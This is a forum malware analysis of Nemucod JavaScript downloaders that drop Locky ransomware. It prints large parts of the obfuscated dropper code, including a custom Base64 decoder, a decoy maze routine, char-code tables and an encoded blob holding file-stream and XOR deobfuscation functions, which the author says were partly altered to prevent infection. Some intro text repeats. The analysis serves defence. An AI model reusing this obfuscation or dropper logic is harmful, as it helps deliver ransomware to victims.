- May 14, 2016
- 1,597
From : https://malwaretips.com/threads/27-10-2016-8.64887/
Thanks to @Der.Reisende
EDITED : added at the end some changes on new samples :
From : https://malwaretips.com/threads/28-10-2016-10.64919/
Thanks to @silversurfer
Why this samples ?
I already analyzed similar script-based donwloader, (several months ago), and will show you how they have improved (or not) the way they hide important data.
This 4 samples used exactly the same obfuscation, only deobfuscated data may change (urls and payload names)
WARNING : See my previous analysis to understand this one, I will only show the "evolution" (or not) from last versions
As examples :
https://malwaretips.com/threads/dow...om-malware-vault-1-8-16-13.61898/#post-530229
https://malwaretips.com/threads/824643807708-wsf-dropper-js_nemucod-smk2.62677/
https://malwaretips.com/threads/deo...4-malware-vault-wsf-dropper-js_nemucod.62938/
I just remember you how work a nemucod downloader :
- download an obfuscated payload, that is then deobfuscated using several functions :
Some part has been modified just to avoid copy-past => save => run => infection
2) Quick search to see if they used same methods as previous analysis :
If they didn't improved their script, remember that it was very easy to retrieve the URLS used
2-1) First : Is there still a pattern used to obfuscate the strings ? :
Only looking for the replace word ...
=> the function to do Base64 decoding (that removes some string before) :
function nikeFootballAir23 (kuloma) {
}
Ok, it uses the same method, and we have found the string used to obfuscated the real Base64 encoded strings => WEAGLEWEAGLE
Note : I could have find the function name just with this :
nikeFootballAir23("c2F2WEAGLEWEAGLEZVRvRmlsZQ=WEAGLEWEAGLE=WEAGLEWEAGLE")
2-2) URLs - Let's see at the end :
var nazadposmotrishvdrugzanzibar5checheche = [
Array of string ...some with the pattern found : WEAGLEWEAGLE
var nazadposmotrishvdrugzanzibar5checheche = [
Let's make a Decode from Base64 format, to test :
2-3) The nemucod part :
var nazadposmotrishvdrugzanzibar5LUCIODOR = nikeFootballAir23("VkdSQTEgPSBmdW5jdGlvbiAoVkdSQTkpDQogew0KIHZhciBWR1JBMj1XU2NyaXB0WyJDcmVhdGVPYmplY3QiXSgiQURPREIuU3RyZWFtIik7DQogVkdSQTJbInR5cGUiXSA9IDI7DQogVkdSQTJbIkNoYXJzZXQiXSA9IDQzNzsNCiBWR1JBMlsib3BlbiJdKCk7DQogVkdSQTJbIkxvYWRGcm9tRmlsZSJdKFZHUkE5KTsNCiB2YXIgVkdSQTEwPVZHUkEyWyJSZWFkVGV4dCJdOw0KIFZHUkEyWyJjbG9zZSJdKCk7DQogcmV0dXJuIFZHUkEzKFZHUkExMCk7DQp9Ow0KVkdSQTMgPSBmdW5jdGlvbiAoVkdSQTEwKQ0KIHsgDQp2YXIgdDE9bmV3IEFycmF5KCk7DQp0MVsweEM3XSA9IDB4ODA7dDFbMHhGQ10gPSAweDgxO3QxWzB4RTldID0gMHg4Mjt0MVsweEUyXSA9IDB4ODM7dDFb
...
...
JpdGVUZXh0Il0oVkdSQTQoVkdSQTExKSk7DQogVkdSQTJbIlNhdmVUb0ZpbGUiXShWR1JBOSwgMik7DQogVkdSQTJbImNsb3NlIl0oKTsNCn07DQogDQpWR1JBNiA9IGZ1bmN0aW9uIChWR1JBNykNCiB7DQogZm9yICh2YXIgVGo9MDsgVGogPCBWR1JBN1sibGVuZ3RoIl07IFRqKyspDQogIHsNCiBWR1JBN1tUal0gXj0gVkdSQThbTWF0aC5mbG9vcihUaiAlIFZHUkE4Lmxlbmd0aCldOw0KIH0gDQogcmV0dXJuIFZHUkE3Ow0KfTsg");
The string in red (a long part has been cut) : an obfuscated string.
It calls the nikeFootballAir23 function, to make Base64 decoding.
Interesting to note that it doesn't content any pattern WEAGLEWEAGLE :
=> only a copy-paste on a Base64 decoding tool give the real part
//Load the file from HD, first decipher function
VGRA1 = function (VGRA9)
{
// First Decipher function
VGRA3 = function (VGRA10)
{
// second decipher function
VGRA4 = function (VGRA11)
{
//Save the file to the HD after first decipher call
VGRA5 = function (VGRA9, VGRA11)
{
// deobfuscation with XOR
VGRA6 = function (VGRA7)
{
=> Calls from "normal" parts !
When we follow in the right order what the script is doing (step by step ) :
After a lot vars have been prepared with the real data :
function nazadposmotrishvdrugzanzibar5_a2(url, temp_file_name, extension, Param4){
- Still not difficult to find important data, in this family of script :
- payload : Locky ransomware with .thor extension
- EnhancedStoragePasswordConfig is the name of the Entry point
Edited :
last summary (using the steps described in the current thread)
- sample from 04/11/2016 (dd/mm/yy)
https://malwaretips.com/threads/5-x...y-thor-downloaders-updated.64894/#post-561313
-sample from 08/11/2016 (dd/mm/yy)
https://malwaretips.com/threads/6-x...rs-oct-27-to-nov-8-updated.64894/#post-563027
- 2 Samples from 29/11/2016 (dd/mm/yy)
https://malwaretips.com/threads/28-11-2016-20.65943/
Thanks to @Der.Reisende
EDITED : added at the end some changes on new samples :
- 04/11/2016 (dd/mm/yy)
- 08/11/2016 (dd/mm/yy)
- 29/11/2016 (dd/mm/yy)
- 08/11/2016 (dd/mm/yy)
- 29/11/2016 (dd/mm/yy)
5190512.wsf
27991851_Invoice.jse
7171450.wsf
27991851_Invoice.jse
7171450.wsf
From : https://malwaretips.com/threads/28-10-2016-10.64919/
Thanks to @silversurfer
FAX_0780.wsf
Why this samples ?
I already analyzed similar script-based donwloader, (several months ago), and will show you how they have improved (or not) the way they hide important data.
This 4 samples used exactly the same obfuscation, only deobfuscated data may change (urls and payload names)
WARNING : See my previous analysis to understand this one, I will only show the "evolution" (or not) from last versions
As examples :
https://malwaretips.com/threads/dow...om-malware-vault-1-8-16-13.61898/#post-530229
https://malwaretips.com/threads/824643807708-wsf-dropper-js_nemucod-smk2.62677/
https://malwaretips.com/threads/deo...4-malware-vault-wsf-dropper-js_nemucod.62938/
I just remember you how work a nemucod downloader :
- download an obfuscated payload, that is then deobfuscated using several functions :
2 x decipher, deobfuscation with XOR part, etc
1 ) 5190512.wsf : What it looks like :Some part has been modified just to avoid copy-past => save => run => infection
var Maze = {
/**
* @returns {Array} a copy of a random direction ordering
*/
dirs: function() {
return Maze.shuffle(Maze.DIRS.slice(0));
}
};
/**
* @param {Array} array
* @returns {Array} array
*/
Maze.shuffle = function(array) {
var counter = array.length;
while (counter > 0) {
var tmp = array[counter];
array[counter] = array[index];
array[index] = tmp;
}
return array;
};
var vlumpelch = 4;
var nazadposmotrishvdrugzanzibarEmptyVara = "571";
Maze.random = function(array) {
var i = Math.floor(Math.random() * array.length);
if (i === array.length - 1) {
return array.pop();
} else {
var element = array;
array = array.pop();
return element;
}
};
String.prototype.Zhido = function(a1a,b2b) {
return this["re"+"pl"+"ac"+"e"](a1a, b2b);}
var mercedesbenzzMEGARAA = new Array(-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-95+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-94+vlumpelch*2,-105+vlumpelch*2,-104+vlumpelch*2,-103+vlumpelch*2,-102+vlumpelch*2,-101+vlumpelch*2,-100+vlumpelch*2,-99+vlumpelch*2,-98+vlumpelch*2,-97+vlumpelch*2,-96+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-157+vlumpelch*2,-156+vlumpelch*2,-155+vlumpelch*2,-154+vlumpelch*2,-153+vlumpelch*2,-152+vlumpelch*2,-151+vlumpelch*2,-150+vlumpelch*2,-149+vlumpelch*2,-148+vlumpelch*2,-147+vlumpelch*2,-146+vlumpelch*2,-145+vlumpelch*2,-144+vlumpelch*2,-143+vlumpelch*2,-142+vlumpelch*2,-141+vlumpelch*2,-140+vlumpelch*2,-139+vlumpelch*2,-138+vlumpelch*2,-137+vlumpelch*2,-136+vlumpelch*2,-135+vlumpelch*2,-134+vlumpelch*2,-133+vlumpelch*2,-132+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-131+vlumpelch*2,-130+vlumpelch*2,-129+vlumpelch*2,-128+vlumpelch*2,-127+vlumpelch*2,-126+vlumpelch*2,-125+vlumpelch*2,-124+vlumpelch*2,-123+vlumpelch*2,-122+vlumpelch*2,-121+vlumpelch*2,-120+vlumpelch*2,-119+vlumpelch*2,-118+vlumpelch*2,-117+vlumpelch*2,-116+vlumpelch*2,-115+vlumpelch*2,-114+vlumpelch*2,-113+vlumpelch*2,-112+vlumpelch*2,-111+vlumpelch*2,-110+vlumpelch*2,-109+vlumpelch*2,-108+vlumpelch*2,-107+vlumpelch*2,-106+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2,-158+vlumpelch*2
);
var nazadposmotrishvdrugzanzibarREPONAFT = {'77' : '','U': 'S', ':': '.', '3IKSA': 'X', '348':'','571':'', 'UPONA':'pons','1000':'r'};
var abbida = 'fromCharCode';
var nazadposmotrishvdrugzanzibar5lololosh="l";
nazadposmotrishvdrugzanzibarREPONAFT['88'] = '';
function nazadposmotrishvdrugzanzibar5achievment(nazadposmotrishvdrugzanzibar5bidttt){if(nazadposmotrishvdrugzanzibar5bidttt==1){return 2;}else{return 17;}
return 3;};
function nazadposmotrishvdrugzanzibar5misterdenisk(mercedesbenzzVLUMAHx, mercedesbenzzVLUMAHy) {
mercedesbenzzVLUMAHx = DDmercedesbenzzVLUMAH * mercedesbenzzVLUMAHddd;
mercedesbenzzVLUMAHy = mercedesbenzzVLUMAHZZ / 801;
};
function nazadposmotrishvdrugzanzibar5center(nazadposmotrishvdrugzanzibar5rivulet) {
request = nazadposmotrishvdrugzanzibar5rivulet;
for (var nazadposmotrishvdrugzanzibar5XCOP in nazadposmotrishvdrugzanzibarREPONAFT){
request = request['replace'](nazadposmotrishvdrugzanzibar5XCOP, nazadposmotrishvdrugzanzibarREPONAFT[nazadposmotrishvdrugzanzibar5XCOP]);}
return request;
};
var Franch = "eng";
var fshisr = 0xff;
function nikeFootballAir23 (kuloma) {nazadposmotrishvdrugzanzibarXCOP = 0;
var nazadposmotrishvdrugzanzibarddDccC1, nazadposmotrishvdrugzanzibarddDccC2, nazadposmotrishvdrugzanzibarc3, nazadposmotrishvdrugzanzibarc4;
var nazadposmotrishvdrugzanzibarout = "";
var nazadposmotrishvdrugzanzibar5nugash= kuloma["replace"](/WEAGLEWEAGLE/g, '');
var nazadposmotrishvdrugzanzibarlen = nazadposmotrishvdrugzanzibar5sud(nazadposmotrishvdrugzanzibar5nugash);
while (nazadposmotrishvdrugzanzibarXCOP < nazadposmotrishvdrugzanzibarlen) {
do {
nazadposmotrishvdrugzanzibarddDccC1 = mercedesbenzzMEGARAA[nazadposmotrishvdrugzanzibar5nugash["charCodeAt"](nazadposmotrishvdrugzanzibarXCOP++) & fshisr];
} while (nazadposmotrishvdrugzanzibarXCOP < nazadposmotrishvdrugzanzibarlen && nazadposmotrishvdrugzanzibarddDccC1 == -1);
if (nazadposmotrishvdrugzanzibarddDccC1 == -1)
break;
var nazadposmotrishvdrugzanzibardodo = false;
do {
nazadposmotrishvdrugzanzibarddDccC2 = mercedesbenzzMEGARAA[nazadposmotrishvdrugzanzibar5nugash.charCodeAt(nazadposmotrishvdrugzanzibarXCOP++) & fshisr];
nazadposmotrishvdrugzanzibardodo = nazadposmotrishvdrugzanzibarXCOP < nazadposmotrishvdrugzanzibarlen && nazadposmotrishvdrugzanzibarddDccC2 == 2-3;
} while (nazadposmotrishvdrugzanzibardodo);
if (nazadposmotrishvdrugzanzibarddDccC2 +1== 0)
break;
nazadposmotrishvdrugzanzibarout += String[abbida]((nazadposmotrishvdrugzanzibarddDccC1 << 2) | ((nazadposmotrishvdrugzanzibarddDccC2 & 0x30) >> 4));
var nazadposmotrishvdrugzanzibardodo2 = false;
do {
nazadposmotrishvdrugzanzibarc3 = nazadposmotrishvdrugzanzibar5nugash.charCodeAt(nazadposmotrishvdrugzanzibarXCOP++) & 0xff;
if (nazadposmotrishvdrugzanzibarc3 == 10*6+0.5*2)
return nazadposmotrishvdrugzanzibarout;
nazadposmotrishvdrugzanzibarc3 = mercedesbenzzMEGARAA[nazadposmotrishvdrugzanzibarc3];
nazadposmotrishvdrugzanzibardodo2 = nazadposmotrishvdrugzanzibarXCOP < nazadposmotrishvdrugzanzibarlen && nazadposmotrishvdrugzanzibarc3 == -1
} while (nazadposmotrishvdrugzanzibardodo2);
if (nazadposmotrishvdrugzanzibarc3 == -1)
break;
nazadposmotrishvdrugzanzibarout += String["fromCharCode"](((nazadposmotrishvdrugzanzibarddDccC2 & 0XF) << 4) | ((nazadposmotrishvdrugzanzibarc3 & 0x3c) >> 2));
do {
nazadposmotrishvdrugzanzibarc4 = nazadposmotrishvdrugzanzibar5nugash.charCodeAt(nazadposmotrishvdrugzanzibarXCOP++);
nazadposmotrishvdrugzanzibarc4 = nazadposmotrishvdrugzanzibarc4 & fshisr;
if (nazadposmotrishvdrugzanzibarc4 == 61)
return nazadposmotrishvdrugzanzibarout;
nazadposmotrishvdrugzanzibarc4 = mercedesbenzzMEGARAA[nazadposmotrishvdrugzanzibarc4];
} while (nazadposmotrishvdrugzanzibarXCOP < nazadposmotrishvdrugzanzibarlen && nazadposmotrishvdrugzanzibarc4 == -1);
if (nazadposmotrishvdrugzanzibarc4 == -1)
break;
nazadposmotrishvdrugzanzibarout += String[abbida](((nazadposmotrishvdrugzanzibarc3 & 0x03) << 6) | nazadposmotrishvdrugzanzibarc4);
}
return nazadposmotrishvdrugzanzibarout;
};
function encodeHex(bytes) {
var s = '';
for (; {
var b = bytes;
if (b < 16) c = '0' + c;
s += c;
}
return s;
}
function bytesOf (x) {
x = Math.floor(x);
var bytes = [];
return bytes;
}
var mercedesbenzzVITK_OBLOM, mercedesbenzzMEGARAAHO = mercedesbenzzMEGARAA.length;
for (mercedesbenzzVITK_OBLOM= 0; mercedesbenzzVITK_OBLOM < mercedesbenzzMEGARAAHO; ++mercedesbenzzVITK_OBLOM) {
mercedesbenzzMEGARAA[mercedesbenzzVITK_OBLOM] = mercedesbenzzMEGARAA[mercedesbenzzVITK_OBLOM]+157 - vlumpelch*2;
}
var nazadposmotrishvdrugzanzibar5DRUZA = 17* (221-4)*(44-4-40);
var nazadposmotrishvdrugzanzibar5TRUEFALSE=("cewefW" + WScript =="cewefW" + nikeFootballAir23("V2WEAGLEWEAGLElWEAGLEWEAGLEuZG93cyBTY3JpcHQgSG9zdA=WEAGLEWEAGLE=") )&&typeof(nazadposmotrishvdrugzanzibar5GzEAPd)==="undefined";
var nazadposmotrishvdrugzanzibar5weasel = ""+"E"+"";
var nazadposmotrishvdrugzanzibar5lidgen = nikeFootballAir23("QWN0aXZlWE9iamVjdAWEAGLEWEAGLE=WEAGLEWEAGLE=WEAGLEWEAGLE");
var nazadposmotrishvdrugzanzibar5chosen = Math.round(0.7 * 2 - 0.4);
var VGRA1,VGRA3,VGRA4,VGRA5,VGRA6, nazadposmotrishvdrugzanzibarnazadposmotrishvdrugzanzibar23;
var nazadposmotrishvdrugzanzibar5LUCIODOR = nikeFootballAir23_("VkdSQTEgPSBmdW5jdGlvbiAoVkdSQTkpDQogew0KIHZhciBWR1JBMj1XU2NyaXB0WyJDcmVhdGVPYmplY3QiXSgiQURPREIuU3RyZWFtIik7DQogVkdSQTJbInR5cGUiXSA9IDI7DQogVkdSQTJbIkNoYXJzZXQiXSA9IDQzNzsNCiBWR1JBMlsib3BlbiJdKCk7DQogVkdSQTJbIkxvYWRGcm9tRmlsZSJdKFZHUkE5KTsNCiB2YXIgVkdSQTEwPVZHUkEyWyJSZWFkVGV4dCJdOw0KIFZHUkEyWyJjbG9zZSJdKCk7DQogcmV0dXJuIFZHUkEzKFZHUkExMCk7DQp9Ow0KVkdSQTMgPSBmdW5jdGlvbiAoVkdSQTEwKQ0KIHsgDQp2YXIgdDE9bmV3IEFycmF5KCk7DQp0MVsweEM3XSA9IDB4ODA7dDFbMHhGQ10gPSAweDgxO3QxWzB4RTldID0gMHg4Mjt0MVsweEUyXSA9IDB4ODM7dDFbMHhFNF0gPSAweDg0O3QxWzB4RTBdID0gMHg4NTt0MVsweEU1XSA9IDB4ODY7dDFbMHhFN10gPSAweDg3O3QxWzB4RUFdID0gMHg4ODt0MVsweEVCXSA9IDB4ODk7dDFbMHhFOF0gPSAweDhBO3QxWzB4RUZdID0gMHg4Qjt0MVsweEVFXSA9IDB4OEM7dDFbMHhFQ10gPSAweDhEO3QxWzB4QzRdID0gMHg4RTt0MVsweEM1XSA9IDB4OEY7dDFbMHhDOV0gPSAweDkwO3QxWzB4RTZdID0gMHg5MTt0MVsweEM2XSA9IDB4OTI7dDFbMHhGNF0gPSAweDkzO3QxWzB4RjZdID0gMHg5NDt0MVsweEYyXSA9IDB4OTU7dDFbMHhGQl0gPSAweDk2O3QxWzB4RjldID0gMHg5Nzt0MVsweEZGXSA9IDB4OTg7dDFbMHhENl0gPSAweDk5O3QxWzB4RENdID0gMHg5QTt0MVsweEEyXSA9IDB4OUI7dDFbMHhBM10gPSAweDlDO3QxWzB4QTVdID0gMHg5RDt0MVsweDIwQTddID0gMHg5RTt0MVsweDE5Ml0gPSAweDlGO3QxWzB4RTFdID0gMHhBMDt0MVsweEVEXSA9IDB4QTE7dDFbMHhGM10gPSAweEEyO3QxWzB4RkFdID0gMHhBMzt0MVsweEYxXSA9IDB4QTQ7dDFbMHhEMV0gPSAweEE1O3QxWzB4QUFdID0gMHhBNjt0MVsweEJBXSA9IDB4QTc7dDFbMHhCRl0gPSAweEE4O3QxWzB4MjMxMF0gPSAweEE5O3QxWzB4QUNdID0gMHhBQTt0MVsweEJEXSA9IDB4QUI7dDFbMHhCQ10gPSAweEFDO3QxWzB4QTFdID0gMHhBRDt0MVsweEFCXSA9IDB4QUU7dDFbMHhCQl0gPSAweEFGO3QxWzB4MjU5MV0gPSAweEIwO3QxWzB4MjU5Ml0gPSAweEIxO3QxWzB4MjU5M10gPSAweEIyO3QxWzB4MjUwMl0gPSAweEIzO3QxWzB4MjUyNF0gPSAweEI0O3QxWzB4MjU2MV0gPSAweEI1O3QxWzB4MjU2Ml0gPSAweEI2O3QxWzB4MjU1Nl0gPSAweEI3O3QxWzB4MjU1NV0gPSAweEI4O3QxWzB4MjU2M10gPSAweEI5O3QxWzB4MjU1MV0gPSAweEJBO3QxWzB4MjU1N10gPSAweEJCO3QxWzB4MjU1RF0gPSAweEJDO3QxWzB4MjU1Q10gPSAweEJEO3QxWzB4MjU1Ql0gPSAweEJFO3QxWzB4MjUxMF0gPSAweEJGO3QxWzB4MjUxNF0gPSAweEMwO3QxWzB4MjUzNF0gPSAweEMxO3QxWzB4MjUyQ10gPSAweEMyO3QxWzB4MjUxQ10gPSAweEMzOyANCnQxWzB4MjUwMF0gPSAweEM0O3QxWzB4MjUzQ10gPSAweEM1O3QxWzB4MjU1RV0gPSAweEM2O3QxWzB4MjU1Rl0gPSAweEM3O3QxWzB4MjU1QV0gPSAweEM4O3QxWzB4MjU1NF0gPSAweEM5O3QxWzB4MjU2OV0gPSAweENBO3QxWzB4MjU2Nl0gPSAweENCO3QxWzB4MjU2MF0gPSAweENDO3QxWzB4MjU1MF0gPSAweENEO3QxWzB4MjU2Q10gPSAweENFO3QxWzB4MjU2N10gPSAweENGO3QxWzB4MjU2OF0gPSAweEQwO3QxWzB4MjU2NF0gPSAweEQxO3QxWzB4MjU2NV0gPSAweEQyO3QxWzB4MjU1OV0gPSAweEQzO3QxWzB4MjU1OF0gPSAweEQ0O3QxWzB4MjU1Ml0gPSAweEQ1O3QxWzB4MjU1M10gPSAweEQ2O3QxWzB4MjU2Ql0gPSAweEQ3O3QxWzB4MjU2QV0gPSAweEQ4O3QxWzB4MjUxOF0gPSAweEQ5O3QxWzB4MjUwQ10gPSAweERBO3QxWzB4MjU4OF0gPSAweERCO3QxWzB4MjU4NF0gPSAweERDO3QxWzB4MjU4Q10gPSAweEREO3QxWzB4MjU5MF0gPSAweERFO3QxWzB4MjU4MF0gPSAweERGO3QxWzB4M0IxXSA9IDB4RTA7dDFbMHhERl0gPSAweEUxO3QxWzB4MzkzXSA9IDB4RTI7dDFbMHgzQzBdID0gMHhFMzt0MVsweDNBM10gPSAweEU0O3QxWzB4M0MzXSA9IDB4RTU7dDFbMHhCNV0gPSAweEU2O3QxWzB4M0M0XSA9IDB4RTc7dDFbMHgzQTZdID0gMHhFODt0MVsweDM5OF0gPSAweEU5O3QxWzB4M0E5XSA9IDB4RUE7dDFbMHgzQjRdID0gMHhFQjsgDQp0MVsweDIyMUVdID0gMHhFQzt0MVsweDNDNl0gPSAweEVEO3QxWzB4M0I1XSA9IDB4RUU7dDFbMHgyMjI5XSA9IDB4RUY7dDFbMHgyMjYxXSA9IDB4RjA7dDFbMHhCMV0gPSAweEYxO3QxWzB4MjI2NV0gPSAweEYyO3QxWzB4MjI2NF0gPSAweEYzO3QxWzB4MjMyMF0gPSAweEY0O3QxWzB4MjMyMV0gPSAweEY1O3QxWzB4RjddID0gMHhGNjt0MVsweDIyNDhdID0gMHhGNzt0MVsweEIwXSA9IDB4Rjg7dDFbMHgyMjE5XSA9IDB4Rjk7dDFbMHhCN10gPSAweEZBO3QxWzB4MjIxQV0gPSAweEZCO3QxWzB4MjA3Rl0gPSAweEZDO3QxWzB4QjJdID0gMHhGRDt0MVsweDI1QTBdID0gMHhGRTt0MVsweEEwXSA9IDB4RkY7DQogdmFyIHJlc3VsdEFycmF5PW5ldyBBcnJheSgpOw0KIGZvciAodmFyIFRqPTA7IFRqIDwgVkdSQTEwWyJsZW5ndGgiXTsgVGorKykNCiAgew0KIHZhciBPVmM5PVZHUkExMFsiY2hhckNvZGVBdCJdKFRqKTsNCiBpZiAoT1ZjOSA8IDEyOCkNCiAge3ZhciBISWkzPU9WYzk7fQ0KIGVsc2UNCiAge3ZhciBISWkzPXQxW09WYzldO30NCiByZXN1bHRBcnJheVsicHVzaCJdKEhJaTMpOw0KIH07DQogDQogcmV0dXJuIHJlc3VsdEFycmF5Ow0KfTsNClZHUkE0ID0gZnVuY3Rpb24gKFZHUkExMSkNCiB7DQogdmFyIHQyPW5ldyBBcnJheSgpOw0KIA0KdDJbMHg4MF0gPSAweDAwQzc7dDJbMHg4MV0gPSAweDAwRkM7dDJbMHg4Ml0gPSAweDAwRTk7dDJbMHg4M10gPSAweDAwRTI7dDJbMHg4NF0gPSAweDAwRTQ7dDJbMHg4NV0gPSAweDAwRTA7dDJbMHg4Nl0gPSAweDAwRTU7dDJbMHg4N10gPSAweDAwRTc7dDJbMHg4OF0gPSAweDAwRUE7dDJbMHg4OV0gPSAweDAwRUI7dDJbMHg4QV0gPSAweDAwRTg7dDJbMHg4Ql0gPSAweDAwRUY7dDJbMHg4Q10gPSAweDAwRUU7dDJbMHg4RF0gPSAweDAwRUM7dDJbMHg4RV0gPSAweDAwQzQ7dDJbMHg4Rl0gPSAweDAwQzU7dDJbMHg5MF0gPSAweDAwQzk7dDJbMHg5MV0gPSAweDAwRTY7dDJbMHg5Ml0gPSAweDAwQzY7dDJbMHg5M10gPSAweDAwRjQ7dDJbMHg5NF0gPSAweDAwRjY7dDJbMHg5NV0gPSAweDAwRjI7dDJbMHg5Nl0gPSAweDAwRkI7dDJbMHg5N10gPSAweDAwRjk7dDJbMHg5OF0gPSAweDAwRkY7dDJbMHg5OV0gPSAweDAwRDY7dDJbMHg5QV0gPSAweDAwREM7dDJbMHg5Ql0gPSAweDAwQTI7dDJbMHg5Q10gPSAweDAwQTM7dDJbMHg5RF0gPSAweDAwQTU7dDJbMHg5RV0gPSAweDIwQTc7dDJbMHg5Rl0gPSAweDAxOTI7dDJbMHhBMF0gPSAweDAwRTE7dDJbMHhBMV0gPSAweDAwRUQ7dDJbMHhBMl0gPSAweDAwRjM7dDJbMHhBM10gPSAweDAwRkE7dDJbMHhBNF0gPSAweDAwRjE7dDJbMHhBNV0gPSAweDAwRDE7dDJbMHhBNl0gPSAweDAwQUE7dDJbMHhBN10gPSAweDAwQkE7dDJbMHhBOF0gPSAweDAwQkY7dDJbMHhBOV0gPSAweDIzMTA7dDJbMHhBQV0gPSAweDAwQUM7dDJbMHhBQl0gPSAweDAwQkQ7dDJbMHhBQ10gPSAweDAwQkM7dDJbMHhBRF0gPSAweDAwQTE7dDJbMHhBRV0gPSAweDAwQUI7dDJbMHhBRl0gPSAweDAwQkI7dDJbMHhCMF0gPSAweDI1OTE7dDJbMHhCMV0gPSAweDI1OTI7dDJbMHhCMl0gPSAweDI1OTM7dDJbMHhCM10gPSAweDI1MDI7dDJbMHhCNF0gPSAweDI1MjQ7dDJbMHhCNV0gPSAweDI1NjE7dDJbMHhCNl0gPSAweDI1NjI7dDJbMHhCN10gPSAweDI1NTY7dDJbMHhCOF0gPSAweDI1NTU7dDJbMHhCOV0gPSAweDI1NjM7dDJbMHhCQV0gPSAweDI1NTE7dDJbMHhCQl0gPSAweDI1NTc7dDJbMHhCQ10gPSAweDI1NUQ7dDJbMHhCRF0gPSAweDI1NUM7dDJbMHhCRV0gPSAweDI1NUI7dDJbMHhCRl0gPSAweDI1MTA7dDJbMHhDMF0gPSAweDI1MTQ7dDJbMHhDMV0gPSAweDI1MzQ7dDJbMHhDMl0gPSAweDI1MkM7dDJbMHhDM10gPSAweDI1MUM7dDJbMHhDNF0gPSAweDI1MDA7dDJbMHhDNV0gPSAweDI1M0M7dDJbMHhDNl0gPSAweDI1NUU7dDJbMHhDN10gPSAweDI1NUY7dDJbMHhDOF0gPSAweDI1NUE7dDJbMHhDOV0gPSAweDI1NTQ7dDJbMHhDQV0gPSAweDI1Njk7dDJbMHhDQl0gPSAweDI1NjY7dDJbMHhDQ10gPSAweDI1NjA7dDJbMHhDRF0gPSAweDI1NTA7dDJbMHhDRV0gPSAweDI1NkM7dDJbMHhDRl0gPSAweDI1Njc7dDJbMHhEMF0gPSAweDI1Njg7dDJbMHhEMV0gPSAweDI1NjQ7